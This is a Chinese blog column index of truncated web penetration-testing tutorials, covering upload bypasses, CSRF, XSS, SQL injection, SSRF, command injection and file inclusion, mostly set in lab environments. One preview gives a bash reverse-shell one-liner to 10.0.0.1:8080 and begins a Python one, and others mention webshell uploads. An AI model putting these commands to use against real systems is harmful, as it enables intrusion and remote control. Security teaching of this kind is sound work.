
web渗透
常见的渗透测试方法总结
星球守护者
要学会感恩同情宽容忍耐积极与真诚。希望是心灵的一种支持力量。逆境的回馈,使生命将更加精彩而富足。
展开
-
记一次文件上传漏洞的修复过程
程序员:开发完成文件上传功能,可以正常上传任意文件hack测试:发现文件上传功能,没有做任何限制,导致可以上传脚本并执行程序员:在前端使用js限制一下文件上传的后缀吧hack测试:使用burp上传并提交,绕过js验证,还是可以利用上传脚本程序员:在服务器限制一下文件上传的后缀`,禁止上传php\html等后缀hacke测试:你的黑名单验证没有写全,可以上传php3后缀的文件程序员:限制白名单,只允许上传png\gif文件hacke测试:上传的时候用00截断,比如xx.php.png,上传之后变原创 2022-03-10 14:30:40 · 665 阅读 · 0 评论 -
nginx 修复TLS1.0,TLS1.1协议漏洞
首先通过检测命令:nmap --script ssl-enum-ciphers -p 443 ip地址开启的情况:修复# 原始配置 # ssl_protocols TLSv1 TLSv1.1 TLSv1.2 ; # 修复配置 ssl_protocols TLSv1.2 ;完整配置# HTTPS serverserver { listen 443 ssl; server_name 192.168.1.100; keepalive_timeout原创 2021-02-08 20:20:53 · 3686 阅读 · 0 评论 -
登录认证模块之暴力破解
介绍暴力破解测试是针对应用系统的用户登录帐号与密码进行的穷举测试,对登录帐号或密码进行逐一比较,直到找出正确的帐号与密码。产生原因当系统存在登录功能,并且没有做好对应的防护措施时,会导致攻击者通过穷举或其它方式猜解岀帐号及密码,从而对目标系统及用户造成危害。流程图客户端程序黑客方的控制台,它负责远程遥控指挥服务器端程序(被攻击方)服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡03原创 2020-07-09 16:30:21 · 1808 阅读 · 0 评论 -
4.4CSRF防御
4.4 CSRF防御二次确认在调用某些功能时进行二次验证,如:删除用户时,产生一个提示对话框,提示“确定删除用户吗?”。转账操作时,要求用户输入二次密码,设置验证码,在进行敏感操作时输入验证码。当二次验证后,即使用户打开了 CSRF POC页面,也不会直接去执行,而需要用户再次输才可以完成攻击。这样,当用户突然收到提示后,可能会心存怀疑,就不再会乖乖地中招。Token 认证原理Token即标志、记号的意思,在IT领域也叫作令牌。CSRF攻击成功的两个要素:攻击者可得知UR原创 2020-05-28 17:02:49 · 866 阅读 · 0 评论 -
4.3检测CSRF漏洞
检测CSRF漏洞手工检测前提CSRF只能通过用户的正规操作进行攻击,实际上就是劫持用户操作。在检测前首先需要确定Web应用程序的所有功能以及确定哪些操作是敏感的比如修改密码、转账、发表留言等功能第一步 抓取删除用户得数据包第二步 编写CSRF POC<html> <body> <script>history.pushState('', '', '/')</script> <form action="原创 2020-05-28 16:57:52 · 2009 阅读 · 2 评论 -
4.2浏览器的Cookie机制
4.3浏览器Cookie机制CSRF攻击CSRF攻击得前提是用户处于登录状态可能会注意到一个情况,有些网站提供了“记住我”或者是“1个月之内免登录”的功能毫无疑问,这使用户方便了许多,在登录网站时无须再次输入密码但当攻击者进行CSRF攻击时,用户也更容易中招。Cookie得两种表现形式本地Cookie(持久性Cookie)持久型 Cookie是服务器端脚本语言向客户端发送 Cookie时制定了时效也就是 Expire字段,而且会存储于本地当 Expire所制定的时效过期后,原创 2020-05-28 16:54:23 · 870 阅读 · 0 评论 -
4.1CSRF介绍
跨站点请求伪造(CSRF)CSRF简介CSRF( Cross-Site Request Forgery)是指跨站请求伪造,也常常被称为“ One Click Attack或者“ Session Riding”,通常缩写为CSRF或是XSRF。虽然CSRF听起来像XSS跨站脚本攻击,但CSRF与XSS的攻击方式完全不同。CSRF与XSS相比,虽然CSRF攻击不太流行,但却更加难以防范,所以被认为CSRF比XSS更具危险性,CSRF在业内具有“苏醒的巨人”的称号。可以这么理解CSRF攻原创 2020-05-28 16:45:48 · 510 阅读 · 0 评论 -
渗透中反弹shell与端口
渗透中反弹shell与端口bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1注意这个是由解析shell的bash完成,所以某些情况下不支持python版本:`python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...原创 2020-01-03 12:37:51 · 1863 阅读 · 0 评论 -
phpstudy数据库渗透测试
环境:自己本地搭建phpstudy第一步:链接搭建好的phpstudy找到网页的文件存储位置登录后台数据库开启日志服务更改日志文件的存放位置第二步:写入一条命令在SQL语句中插入一条命令第三步:访问日志文件信息根据出入变量a的值连接a=phpinfo();第四步:利用工具连接到该IP所对于的主机可根据虚拟终端,进行创建用户,实现登录【年龄称谓】襁...原创 2019-10-04 17:52:16 · 847 阅读 · 0 评论 -
XSS知识总结
第一章 XSS 漏洞概述第一节 简介XSS 作为OWASP TOP 10 之一,XSS 被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSS。XSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS 可以非常灵活的操作html、c...原创 2020-02-07 15:18:01 · 2269 阅读 · 0 评论 -
XSS 语句的构造
XSS 语句的构造[第一节]利用[<>]构造HTML/JS[第二节]伪协议—使用javascript: 伪协议的方式构造XSS[第三节]产生自己的事件[第四节] XSS 的变形[第五节]其他标签以及手法[第六节]利用CSS 跨站(old)第一节 利用[<>]构造HTML/JS可以利用[<>] 构造HTML 标签和<script> 标...原创 2020-01-02 22:05:34 · 1712 阅读 · 1 评论 -
DVWA学习之XSS
DVWA学习之XSS反射性XSSLow等级【】Medium等级双写绕过:【<scr大小写绕过【】High等级【][]当点击键盘任意一个按键的时候触发。Impossible等级存储型XSSLow等级trim(string,charlist)函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参...原创 2020-01-02 21:38:25 · 517 阅读 · 0 评论 -
xss介绍
一.概述XSS 被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSS。XSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS 可以非常灵活的操作html、css和浏览器,这使得XSS 攻击的“想象”空间特别大。 XSS 通过将精心...原创 2020-01-02 19:38:09 · 1262 阅读 · 0 评论 -
文件上传之服务端绕过(upload-labs第二关)
文章目录第一章 服务器端检测--MIME 类型第二章代码审计-源代码第三章MIME服务器端绕过案例第一步 上传.jpg文件 上传成功 查看图片第二步 上传.php文件 查看提示错误信息第三步 使用burp抓包 更改type类型第四步 查看上传的是否成功执行第五步 上传一句话木马 蚁剑进行连接免责声明第一章 服务器端检测–MIME 类型MIME (Multipurpose Internet...原创 2020-02-25 16:03:34 · 2109 阅读 · 0 评论 -
文件上传之前端绕过(upload-labs第一关)
第一章 前端限制与绕过有些Web 应用的文件上传功能,仅在前端用JS 脚本做了检测,如检测文件后缀名等。upload-labs 第一关,以下是经典的代码。第二章 代码审计-源码<script type="text/javascript"> function checkFile() { var file = document.getElementsByN...原创 2020-02-25 13:29:04 · 1627 阅读 · 2 评论 -
上传文件之PUT方法上传(服务器配置不当)
实验环境Window server 2008 +phpstudy文章目录实验环境第一章 文件上传的条件第二章window server2008开启telnet第三章 Apache 开启PUT 方法第一节 测试Apache 是否开启了put 方法第二节 apache 开启put 方法操作第一步 开启Dav第二步 启用模块第三步.开启文件锁第四章文件上传案例免责声明第一章 文件上传的条件We...原创 2020-02-24 17:00:19 · 9309 阅读 · 0 评论 -
文件上传知识点总结
文章目录第一章 概述第一节 漏洞概述第二节 漏洞成因第三节 漏洞危害第二章 相关术语第一节 WebShell第二节 大马第三节 小马第四节 中国菜刀与一句话木马配合实现了三大基本功能第五节 GetShell第三章 文件上传的条件第一节 一定的条件第三章 策略黑白名单策略第三章 文件上传的利用PUT 方法上传文件第四章 文件上传的绕过第一节 前端限制与绕过第二节 服务器端检测--M...原创 2020-02-07 19:37:39 · 3105 阅读 · 1 评论 -
文件上传
文件上传漏洞#### 漏洞原理1.文件上传是Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站等。2.如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。 漏洞成因1.服务器配置不当会导致任意文件上传;2.Web 应用开放了文件上传功能,并且对上传的文件没有...原创 2020-01-28 22:27:22 · 440 阅读 · 0 评论 -
PHP 代码注入知识点总结
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法第一章 概述第一节 原理以及...原创 2020-02-10 10:15:24 · 2276 阅读 · 0 评论 -
OS命令注入知识点总结
文章目录第一章 原理以及成因第二章·漏洞危害第三章 相关函数第一节 system()第二节 exec()第三节 shell_exec()第四节 passthru()第五节 popen()第六节 反引号第四章 漏洞利用第一节 查看系统文件第二节 显示当前路径第三节写文件第五章 防御方法第六章 DVWA第一节 low命令注入第二节 medium命令注入第一章 原理以及成因程序员使用脚本语言(比...原创 2020-02-09 11:53:18 · 1225 阅读 · 0 评论 -
如何查找SSRF
文章目录一.SSRF二. 目标三.原因四. 利用1.从WEB功能上寻找2.从URL关键字中寻找五. 验证一.SSRFserver-side request forgery 服务器端请求伪造二. 目标从外网无法访问的内部系统三.原因由于服务器端提供了从其他服务器应用获取数据地功能没有对目标地址进行过滤与限制四. 利用1.从WEB功能上寻找分享通过URL地址分...原创 2020-02-09 11:35:14 · 677 阅读 · 0 评论 -
SSRF知识点总结
文章目录第一章第一节 SSRF 概述第二节 SSRF 危害第二章SSRF 常见代码实现第三章 SSRF利用第一节 访问正常文件第二节 端口扫描第三节 读取系统本地文件第四节 内网Web 应用指纹识别第五节 攻击内网应用第四章 SSRF 的防御第一节 限制协议第二节 限制IP第三节 限制端口第四节 过滤返回信息第五节 统一错误信息第一章第一节 SSRF 概述互联网上的很多Web 应用提供...原创 2020-02-09 10:23:00 · 874 阅读 · 0 评论 -
SQLlib-第20关之cookie注入
文章目录第一节 cookie注入原理第二节cookie注入的判断第三节代码审计第四节Cookie注入实例第一步 判断注入类型第二步 .查选表名第三步查选字段名第四步 获取字段值第五步登录数据库后台验证免责声明第一节 cookie注入原理网站传递参数的方式参数类型含义get型一般访问网页的行为cookie型伴随着所有访问网页的行为post型上传文件,登陆...原创 2020-02-22 13:05:34 · 1007 阅读 · 0 评论 -
SQLlib-第32关之宽字节注入
文章目录宽字节注入第一节 构造绕过代码第二节注入原理第三节代码审计第四节注入实操判断字段个数判断显示位置判断数据库版本何当前数据库名数据库中的表名表中字段字段内容免责声明宽字节注入宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。为了说明宽字节注入问题,我们以SQLi-labs 32 关为例子。第一节 构造绕过代码[http://192.168.139.136/sqli-lab...原创 2020-02-22 10:36:06 · 1444 阅读 · 0 评论 -
sql注入之读写文件案例实验
文章目录环境搭建第一节 前提条件第二节 读取文件操作第三节 写入文件操作免责声明环境搭建Window-server2008 —phpstudy-----搭建自己的网页第一节 前提条件我们也可以利用SQL 注入漏洞读写文件。但是读写文件需要一定的条件。1.secure-file-priv改参数可以写在my.ini 配置文件中[mysqld] 下。若要配置此参数,需要修改my.ini ...原创 2020-02-21 19:43:12 · 572 阅读 · 0 评论 -
SQL注入案例实验
文章目录前言第一章 目标第二章联合查询第一节必要条件第二节 判断字段个数第四步 判断显示位置第五步 数据库版本 当前数据库名第六步 数据库中的表第七步 表中字段第八步 字段内容第二章 报错注入第一节 group by 重复键冲突第二节XPATH 报错第三章 布尔盲注第一节 原理第二节数据库名长度第三节数据库名第四章 延时注入第一节 原理第二节获取数据库名长度第三节 数据库名免责声明前言搭建...原创 2020-02-21 13:01:52 · 1302 阅读 · 0 评论 -
记一次sqlmap的案例实验
文章目录环境搭建Sql map参数第一步 检测注入点第二步 列出所有数据库的名字第三步 列出当前数据库的名字第四步 列出表名第五步列出所有的字段名第六步 列出字段内容免责声明环境搭建网站搭建–window server 2008 phpstudy测试机 kali虚拟机Sql map参数参数含义-u “url”检测注入点–dbs列出所有数据库的名字–c...原创 2020-02-21 12:34:47 · 669 阅读 · 0 评论 -
SQL注入知识点总结
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...原创 2020-02-11 11:52:55 · 1636 阅读 · 0 评论 -
文件包含漏洞学习
文章目录第一章 文件包含漏洞概述第一节文件包含第二节产生原因第三节简单案例第四节PHP中文件包含函数第二章 文件包含漏洞类型及利用第一节本地文件包含(DVWA low)第二节包含远程文件第三章文件包含漏洞危害第四章文件包含的利用方法第一节 本地文件包含配合日志文件第二节 本地文件包含配合/proc/self/environ文件第三节利用php协议进行文件包含第五章文件包含漏洞的绕过方法免责声明...原创 2020-03-01 22:40:16 · 799 阅读 · 0 评论 -
文件包含知识点总结
文章目录第一章 概述第一节 说明第二节 漏洞产生的原因第二章 PHP中的文件包含第一节 语句第二节 相关配置第三节 文件包含示例第三章 漏洞原理及特点第一节 漏洞原理第二节 特点第三节 空字符安全绕过第四章 文件包含漏洞的利用第一节 读取敏感文件第二节 直接包含图片木马第三节 包含木马写Shell第四节 PHP 封装协议--访问本地文件第五节 PHP 封装协议--传输PHP 文件第六节 PHP ...原创 2020-02-10 10:56:06 · 746 阅读 · 0 评论